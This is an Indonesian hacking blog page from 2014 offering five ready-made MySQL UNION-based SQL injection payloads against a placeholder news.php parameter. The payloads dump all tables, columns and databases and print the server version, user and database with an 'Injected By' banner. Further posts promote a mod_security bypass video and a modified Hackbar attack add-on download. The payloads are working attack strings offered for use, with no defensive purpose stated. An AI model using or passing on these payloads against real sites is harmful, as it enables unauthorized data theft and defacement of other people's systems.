Subscribe:

Ads 468x60px

Sabtu, 12 April 2014

Playing With SQLi Output

Assalamualaikum, numpang share :D

#PART 1
Menampilkan semua table dalam database
target/v2/news.php?id=90'  div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),3,4,5,6-- -


















#PART 2
Menampilkan seluruh database, table dan column dalam satu perintah
target/v2/news.php?id=90'  div 0 UniOn SeleCt 1,(SELECT(@x)from(SELECT(@x:=0x00),(SELECT(0)from(information_schema.columns)where(table_schema!=0x64617461626173652829)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2f,table_name,0x2f,column_name))))x),3,4,5,6-- -

















 #PART 3
Menampilkan semua table dengan memberi nomor urutan
/news.php?id=90'  div 0 UniOn SeleCt 1,(select (@x) from (select (@x:=0x00), (@running_number:=0),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,@running_number:=@running_number+1,0x2e20,table_name))))x),3,4,5,6-- -

















#PART 4
Menampilkan versi mysql dan nama kita menggunakan  tag dengan html
target/news.php?id=90'  div 0 UniOn SeleCt 1,concat('<b><font color=green size=4><center>InjeCted By wine<br><font color=blue>MySql Version :: <font color=red>',@@version),3,4,5,6-- -

#PART 5
Menampilkan dan membuat table
/news.php?id=90'  div 0 UniOn SeleCt 1,concat(0x3c666f6e7420666163653d636f75726965722073697a653d333e696e6a65637465642062792077696e653e3e20,version(),0x3c7461626c6520626f726465723d313e3c74723e3c74643e557365723c2f74643e3c74643e,user(),0x3c2f74643e3c2f74723e3c74723e3c74643e44617461626173653c2f74643e3c74643e,database(),0x3c2f74643e3c2f74723e3c2f7461626c653e),3,4,5,6-- -





Okay sampai disini dulu, semoga bermanfaat. See u next time

Video SQLi Bypass Mod_Security


Assalamualaikum
This is video about SQLi Bypass Mod_security

 

thanks for watching
Special thank to Ajakaro | MakMan | MadC0de | Fuad | G_26 | Ch3rn0by1 And Indonesian Backtrack Team
 

Jumat, 04 April 2014

Modifikasi Add-ons Hackbar pada Mozilla


Assalamualaikum

hackbar adalah add-ons pada mozilla yang berfungsi untuk menguji sistem kita misalnya sqli dan xss
okay langsung aja download hackbar yang sudah di modifikasi sama teman saya T-Pro :D

http://www.mediafire.com/download/8pmciacmca3pgb7/hackbat_mod_by_tPRO_v1.4.1.rar

pass: /!"§$%&~hackforums~/()~TPRO~=?

download dan ekstrak
di dalam ada file berekstensi .xpi
setelah itu copy ke C>program files>mozilla
kemudian drag dan drop pada mozilla nya, terus install
hasilnya hackbar telah terinstall










okay sekian dan terima kasih